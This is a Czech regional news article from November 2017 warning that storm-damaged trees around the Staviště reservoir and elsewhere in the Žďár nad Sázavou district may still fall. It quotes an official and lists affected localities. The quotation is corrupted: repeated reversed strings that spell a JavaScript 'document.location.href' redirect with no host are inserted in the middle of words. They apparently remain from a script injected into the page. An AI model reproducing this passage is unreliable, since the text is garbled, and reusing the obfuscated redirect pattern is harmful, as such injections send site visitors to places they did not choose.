Rainbow page separator

Nebezpečí pádu stromů hrozí nejenom u žďárské nádrže Staviště

Pátek, 17. listopadu 2017

Žďár nad Sázavou / Nejenom kolem žďárské nádrže Staviště, kde byl vzápětí po větrné bouři Herwart kvůli staticky narušeným stromům zakázán vstup do lesů, ale i v dalších částech žďárského správního obvodu může lidem v lesích hrozit nebezpečí újmy na zdraví či životě. Mnoho vyvrácených, zlomených či jinak poškozených stromů je stále zaklíněných v porostech a kdykoliv mohou spadnout na zem. Vlastníci poškozených lesů vyčíslují veškeré škody a v lesích přibývají další výstražné tabulky.
„Na Žďársku je v lesích velké množství polomového dříví, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nyní vstup do nich nedoporučujeme. Nebezpečí pádu dosud s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojících stromů je vysoké, navíc ho laik obvykle nedovede rozeznat. Nebezpečí v lesích hrozí a ještě tak tři až pět měsíců hrozit bude, pokud nebude kalamita odstraněna,“ uvedl vedoucí odboru životního prostředí žďárského městského úřadu Jaroslav Doubek.
K vichřicí vážně poškozeným oblastem patří například lesy v okolí Velkého Dářka, Račína, Vojnova Městce, Velké Losenice, Vepřové, Nového Veselí a Bohdalova, v úseku mezi Bohdalcem a Ostrovem nad Oslavou a na řadě dalších míst.